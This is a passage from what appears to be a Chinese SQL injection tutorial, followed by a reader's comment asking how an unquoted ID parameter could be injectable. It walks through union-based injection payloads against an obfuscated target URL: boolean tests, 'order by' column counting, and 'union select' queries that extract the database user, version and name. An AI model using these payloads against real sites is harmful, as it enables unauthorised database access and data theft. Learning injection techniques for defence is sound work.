18fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=1 页面返回正常
026K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=2 页面返回错误
证明存在注入点
4、查询当前表有多少列,用order by测试,切换数字,直到不出错为止,测试结果为
947K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. order by 8
5、测试哪列数据有回显(1,2,3列都可以显示)
0f1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=2 union select 1,2,3,4,5,6,7,8
5、查询数据库相关信息
查询当前用户权限 f77K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=2 union select 1,user(),3,4,5,6,7,8
查询当前数据库版本 bc4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=2 union select 1,version(),3,4,5,6,7,8
注:这里根据数据库版本可以选择应对策略
查询当前数据库名称 ed6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=2 union select 1,database(),3,4,5,6,7,8
先==, select * from user where idusers=0 and 1=2 union select 1,2,3,4,5,6,7,8 你这里的 0 and 1=2 union select 1,2,3,4,5,6,7,8 为什么会存在 ? 这个是怎么输入进去的 ? 原始的sql是什么样的?
正常情况下,sql语句,查询人员使用登陆名 select Id,LoginPwd, LoginSalt from tb_user where loginName = @loginName 变量 @loginName = 前端传入值 什么时候允许使用 Id 进行传入的 ? 这么敏感的东西不是不允许使用的吗 ? 即使使用了, 那么也该是一个字符串 ,即 select * from user where idusers=“0 and 1=2 union select 1,2,3,4,5,6,7,8” 而不存 select * from user where idusers=0 and 1=2 union select 1,2,3,4,5,6,7,8。 如果能存在, 那么, 你不是直接可以访问数据库了 ?